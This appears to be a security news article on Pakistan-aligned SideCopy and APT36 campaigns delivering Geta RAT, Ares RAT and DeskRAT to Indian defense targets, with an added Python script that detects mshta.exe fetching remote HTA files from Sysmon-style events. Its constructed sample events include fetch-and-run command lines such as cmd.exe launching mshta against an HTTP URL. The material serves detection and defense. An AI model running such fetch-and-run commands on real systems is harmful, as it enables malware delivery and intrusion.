
India’s defense sector and government-linked organizations have been targeted by multiple campaigns that compromise Windows and Linux environments with remote access trojans (RATs) capable of stealing sensitive data and maintaining persistent access to infected machines.
The activity is characterized by the use of malware families such as Geta RAT, Ares RAT, and DeskRAT, and is attributed to Pakistan-aligned threat clusters tracked as SideCopy and APT36 (also known as Transparent Tribe). SideCopy has been active since at least 2019 and is believed to operate as a sub-group of Transparent Tribe.
“Taken together, these campaigns reinforce a familiar but evolving narrative,” said Aditya K. Sood, vice president of security engineering and AI strategy at Aryaka. “Transparent Tribe and SideCopy aren’t reinventing espionage; they’re refining it.”
“By expanding its cross-platform reach, leveraging memory-resident techniques, and experimenting with new delivery vectors, this ecosystem continues to operate below the noise floor while maintaining its strategic focus.”
What all of the campaigns have in common is the use of phishing emails carrying malicious attachments or embedded download links that lead targets to attacker-controlled infrastructure. These initial access mechanisms serve as the conduit for Windows shortcut (LNK) files, ELF binaries, and PowerPoint add-in files which, when opened, kick off a multi-step process that drops the trojan.
The malware families are designed to provide persistent remote access, perform system reconnaissance, collect data, execute commands, and support long-term post-compromise operations in both Windows and Linux environments.
One of the attack chains proceeds as follows: the malicious LNK file invokes ‘mshta.exe’ to run an HTML Application (HTA) file hosted on a compromised legitimate domain. The HTA contains JavaScript that decrypts an embedded DLL payload. That DLL processes an embedded data blob, writes a decoy PDF to disk, connects to a hardcoded command-and-control (C2) server, and opens the saved decoy document for the victim.

After displaying the decoy document, the malware checks for installed security products and adapts its persistence method accordingly before deploying Geta RAT on the infected host. This attack chain was previously detailed by CYFIRMA and by Seqrite Labs researcher Sathwik Ram Prakki in late December 2025.
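The chain above has a detectable choke point: a user-facing process (Explorer handling the LNK double-click, or an Office application) launching mshta.exe with a URL instead of a local .hta file. The script below is an added example, not code from the article or from any of the vendors cited; it runs simple detection logic over a few constructed, Sysmon-style process-creation records (the field names `Image`, `ParentImage`, `CommandLine`, `User` mirror Sysmon Event ID 1, and the hosts, paths and user names are made up for illustration).

```python
"""Flag process-creation events matching the LNK -> mshta.exe -> remote HTA pattern.

Added example for illustration; not from the original article. The telemetry
below is constructed Sysmon-style Event ID 1 data with a handful of fields.
"""
import json
import ntpath
import re
from typing import Optional
from urllib.parse import urlparse

# Constructed sample events (not real data), one JSON object per line.
SAMPLE_EVENTS = r"""
{"Image":"C:\\Windows\\System32\\mshta.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"mshta.exe https://docs.example.org/notice/view.hta","User":"CORP\\analyst"}
{"Image":"C:\\Windows\\System32\\mshta.exe","ParentImage":"C:\\Program Files\\Vendor\\setup.exe","CommandLine":"mshta.exe C:\\Program Files\\Vendor\\ui\\wizard.hta","User":"CORP\\admin"}
{"Image":"C:\\Windows\\System32\\notepad.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"notepad.exe report.txt","User":"CORP\\analyst"}
{"Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"cmd.exe /c start \"\" mshta http://203.0.113.10/update.hta","User":"CORP\\analyst"}
""".strip().splitlines()

# "mshta" or "mshta.exe" appearing as its own token anywhere in the command line,
# so wrappers such as "cmd /c start mshta <url>" are caught as well.
MSHTA_RE = re.compile(r'(?i)(?:^|[\\\s"])mshta(?:\.exe)?(?=[\s"]|$)')
# A URL or UNC path argument means the HTA body is fetched from somewhere other
# than local disk, which is the behaviour the article describes.
REMOTE_RE = re.compile(r"(?i)\b(?:https?|ftp)://\S+|\\\\[^\\\s]+\\\S+")
# Parents from which a user opening a phishing LNK or attachment would spawn mshta.
USER_FACING_PARENTS = {"explorer.exe", "outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}


def remote_host(target: str) -> str:
    """Return the host portion of a URL or UNC path handed to mshta."""
    if "://" in target:
        return urlparse(target).hostname or target
    return target.lstrip("\\").split("\\", 1)[0]


def classify_event(event: dict) -> Optional[dict]:
    """Return a finding dict for an mshta invocation worth looking at, else None."""
    cmd = event.get("CommandLine", "")
    if not MSHTA_RE.search(cmd):
        return None
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    remote = REMOTE_RE.search(cmd)
    if remote:
        # Remote HTA: high confidence regardless of parent, since legitimate
        # software rarely needs mshta to pull script from a web server.
        return {"severity": "high", "reason": "mshta fetching remote HTA",
                "host": remote_host(remote.group(0)), "parent": parent,
                "user": event.get("User")}
    if parent in USER_FACING_PARENTS:
        # Local HTA launched from Explorer/Office: plausible LNK or attachment
        # lure, but also how some signed installers run their UI, so lower severity.
        return {"severity": "medium", "reason": "mshta launched from user-facing parent",
                "host": None, "parent": parent, "user": event.get("User")}
    return None


def scan(lines) -> list:
    """Run classify_event over JSON-lines telemetry and collect the findings."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        finding = classify_event(json.loads(line))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['reason']}: parent={f['parent']} host={f['host']} user={f['user']}")
```

On the constructed sample, the first and fourth events are flagged high (mshta pulling an HTA from docs.example.org and 203.0.113.10), the vendor installer running a local .hta is ignored, and notepad is never considered. In production the same logic belongs in the SIEM's query language, with an allowlist for the handful of installers known to run local HTAs, and paired with a network-side rule for mshta.exe or the resulting process making outbound connections.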
Geta RAT supports a variety of commands to collect system information, enumerate running processes, terminate specified processes, list installed apps, collect credentials, retrieve and replace the contents of the clipboard with attacker-supplied data, capture screenshots, perform file operations, execute arbitrary shell commands, and collect data from attached USB devices.
Running alongside this Windows-focused campaign is a Linux variant that uses Go binaries as the initial stage to drop the Python-based Ares RAT via shell scripts fetched from external servers. Like Geta RAT, Ares RAT supports a wide range of commands for collecting sensitive data, and can also run Python scripts and commands issued by the threat actors.
Aryaka said it also observed a separate campaign in which the Golang malware DeskRAT was delivered via a malicious PowerPoint add-in file. The add-in runs an embedded macro that establishes an outbound connection to a remote server and retrieves the malware. APT36’s use of DeskRAT was documented by Sekoia and QiAnXin XLab in October 2025.
“These campaigns demonstrate well-resourced espionage-focused threat actors intentionally targeting India’s defense, government, and strategic sectors through defense-themed decoys, official document spoofing, and regionally trusted infrastructure,” the company said. “This work extends beyond defense to policy, research, critical infrastructure, and defense-adjacent organizations operating within the same trusted ecosystem.”
“The deployment of DeskRAT, alongside Geta RAT and Ares RAT, highlights an evolving toolkit optimized for stealth, persistence, and long-term access.”
